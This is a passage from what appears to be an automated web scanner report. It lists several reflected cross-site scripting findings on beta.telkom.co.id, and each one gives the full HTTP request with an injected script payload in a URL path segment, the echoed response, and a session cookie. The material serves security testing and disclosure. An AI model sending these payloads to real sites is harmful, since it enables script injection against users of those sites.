Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:03 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23351
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-mediaf4080<script>alert(1)</script>71eea796522/artikel-infokom/index.html</b>
...[SNIP]...

4.34. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34d55"><script>alert(1)</script>d4049881182 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/artikel-infokom34d55"><script>alert(1)</script>d4049881182/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:33:52 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23752
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/artikel-infokom34d55"><script>alert(1)</script>d4049881182/index.html?&lid=en">
...[SNIP]...

4.35. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload c5cc1--><script>alert(1)</script>87ec397da79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/artikel-infokomc5cc1--><script>alert(1)</script>87ec397da79/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:34:00 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23755
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/artikel-infokomc5cc1--><script>alert(1)</script>87ec397da79/index.html?&lid=en">
...[SNIP]...

4.36. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/artikel-infokom/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2e31b<script>alert(1)</script>d300cf6ec0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/artikel-infokom2e31b<script>alert(1)</script>d300cf6ec0e/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:33:55 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23746
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/artikel-infokom2e31b<script>alert(1)</script>d300cf6ec0e/index.html</b>
...[SNIP]...

4.37. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ebcf5--><script>alert(1)</script>ef3a5ae96a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-mediaebcf5--><script>alert(1)</script>ef3a5ae96a6/berita-telkom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:15 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23749
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediaebcf5--><script>alert(1)</script>ef3a5ae96a6/berita-telkom/index.html?&lid=en">
...[SNIP]...

4.38. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19106"><script>alert(1)</script>a76d99c8f5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media19106"><script>alert(1)</script>a76d99c8f5c/berita-telkom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:06 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23746
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media19106"><script>alert(1)</script>a76d99c8f5c/berita-telkom/index.html?&lid=en">
...[SNIP]...

4.39. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a4087<script>alert(1)</script>aa40da893a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediaa4087<script>alert(1)</script>aa40da893a2/berita-telkom/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:10 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23345
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-mediaa4087<script>alert(1)</script>aa40da893a2/berita-telkom/index.html</b>
...[SNIP]...

4.40. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60f9c<script>alert(1)</script>8ae36b26f5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/berita-telkom60f9c<script>alert(1)</script>8ae36b26f5d/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:23 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23740
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<b>/pojok-media/berita-telkom60f9c<script>alert(1)</script>8ae36b26f5d/index.html</b>
...[SNIP]...

4.41. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d37"><script>alert(1)</script>bbb5636eea0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media/berita-telkomd1d37"><script>alert(1)</script>bbb5636eea0/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:20 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23746
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/berita-telkomd1d37"><script>alert(1)</script>bbb5636eea0/index.html?&lid=en">
...[SNIP]...

4.42. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/berita-telkom/

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 1f818--><script>alert(1)</script>468d84d6482 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-media/berita-telkom1f818--><script>alert(1)</script>468d84d6482/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/artikel-infokom/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:29 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23749
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-media/berita-telkom1f818--><script>alert(1)</script>468d84d6482/index.html?&lid=en">
...[SNIP]...

4.43. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce78"><script>alert(1)</script>7e6a736b2fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-mediabce78"><script>alert(1)</script>7e6a736b2fa/siaran-pers/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:36 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23740
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediabce78"><script>alert(1)</script>7e6a736b2fa/siaran-pers/index.html?&lid=en">
...[SNIP]...

4.44. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload cba5e--><script>alert(1)</script>94534c2b59f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pojok-mediacba5e--><script>alert(1)</script>94534c2b59f/siaran-pers/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:49 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23743
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<a href="/pojok-mediacba5e--><script>alert(1)</script>94534c2b59f/siaran-pers/index.html?&lid=en">
...[SNIP]...

4.45. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9913e<script>alert(1)</script>9c313f8dfec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pojok-media9913e<script>alert(1)</script>9c313f8dfec/siaran-pers/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:41 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23734
Content-Type: text/html

